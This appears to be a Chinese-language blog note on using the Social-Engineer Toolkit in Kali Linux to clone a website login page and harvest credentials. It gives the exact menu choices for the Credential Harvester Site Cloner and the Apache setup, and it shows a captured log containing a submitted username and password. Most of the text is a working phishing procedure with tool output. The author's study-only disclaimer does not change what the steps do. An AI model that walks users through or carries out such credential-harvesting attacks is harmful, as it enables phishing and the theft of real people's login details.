!!!笔记仅供学习交流使用,请勿进行其他用途!!!
setoolkit是一个非常有用的社会工程学工具,里面有很多工具,这里作者只笔记下其最简单的使用方法。
CONTENTS
setoolkit克隆网站的基本流程:
The Social-Engineer Toolkit is a product of TrustedSec. Visit: https://www.trustedsec.com Select from the menu: 1) Social-Engineering Attacks 。。。。。。。。 set> 1 #选择1 1) Spear-Phishing Attack Vectors 2) Website Attack Vectors 。。。。。。。。 set> 2 #选择2 1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 。。。。。。。。 set:webattack>3 #选择3 1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack>2 #选择2 这里我们克隆一个,也可以选择已有的模板或者手动导入 [-] Credential harvester will allow you to utilize the clone capabilities within SET [-] to harvest credentials or parameters from a website as well as place them into a report [-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone:http://www.test.com/login.php #输入要克隆的网址 [*] Cloning the website: http://www.test.com/login.php [*] This could take a little bit... The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] Apache is set to ON - everything will be placed in your web root directory of apache. [*] Files will be written out to the root directory of apache. [*] ALL files are within your Apache directory since you specified it to ON. [!] Apache may be not running, do you want SET to start the process? [y/n]: y #作者在set_config中设置了APACHE为ON,同时保持APACHE的目录为 /var/www [....] Starting web server: apache2apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName . ok Apache webserver is set to ON. Copying over PHP file to the website. Please note that all output from the harvester will be found under apache_dir/harvester_date.txt Feel free to customize post.php in the /var/www directory [*] All files have been copied to /var/www {Press return to continue} #敲回车开始 。。。。。
当有用户进入了这个克隆的网站,并且输入数据后,我们就可以看到后台的日志了:
root@kali:/var/www# pwd /var/www root@kali:/var/www# ls harvester_2014-06-01 18:12:39.762872.txt index.html post.php root@kali:/var/www# cat harvester_2014-06-01\ 18\:12\:39.762872.txt Array ( [log] => test [pwd] => 1234 [wp-submit] => 登录 [redirect_to] => http://www.test.com/login.php [testcookie] => 1 )
注意事项:
作者不是web开发出身,对于web开发不是太熟悉,简单的看了下 index.html 和 post.php 这两个文件,感觉使用这种方式克隆网站局限性还是很大的,必须是采用 post 方式提交才可以,不知道对不对,如果有大神路过,还请指点一二。
发表评论